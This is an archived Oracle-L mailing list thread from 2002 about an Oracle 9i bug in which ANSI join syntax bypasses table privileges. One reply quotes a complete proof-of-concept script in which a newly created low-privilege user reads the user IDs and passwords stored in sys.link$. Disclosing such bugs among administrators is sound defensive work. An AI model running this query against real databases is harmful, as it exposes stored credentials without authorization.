Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> Re: security bug - join syntax

Re: security bug - join syntax

From: <Jared.Still_at_radisys.com>
Date: Fri, 19 Jul 2002 09:04:45 -0800
Message-ID: <F001.0049CBE4.20020719090445@fatcity.com>


Thanks Linda.

Usenet seems to be a little behind the curve though.

Jonathan Lewis discovered this and posted on the list ( you saw it here first! ) over a month ago.

Jared

Linda.Miller-Coker_at_jpmorgan.com
Sent by: root_at_fatcity.com
07/19/2002 09:23 AM
Please respond to ORACLE-L  

        To:     Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>
        cc: 
        Subject:        Re: security bug - join syntax



This just in from comp.databases.oracle.server.

See metalink bug 2121935.

Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script:

connect / as sysdba
create user us1 identified by us1;
grant create session to us1;

connect us1/us1

select userid, password
from

        sys.link$ cross join dual
;

"Adams, Matthew (GEA, MABG, 088130)" <MATT.ADAMS_at_APPL.GE.COM>@fatcity.com on 07/19/2002 11:04:17 AM

Please respond to ORACLE-L_at_fatcity.com

Sent by: root_at_fatcity.com

To: Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com> cc:

Anybody remember the bug number for the security issue with the new join syntax in 9i?



Matt Adams - GE Appliances - matt.adams_at_appl.ge.com The ozone layer or cheese in a spray can. Don't make me choose.

--

Please see the official ORACLE-L FAQ: http://www.orafaq.com
--

Author:
  INET: Linda.Miller-Coker_at_jpmorgan.com

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).

--

Please see the official ORACLE-L FAQ: http://www.orafaq.com
--

Author:
  INET: Jared.Still_at_radisys.com

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). Received on Fri Jul 19 2002 - 12:04:45 CDT

Original text of this message

HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US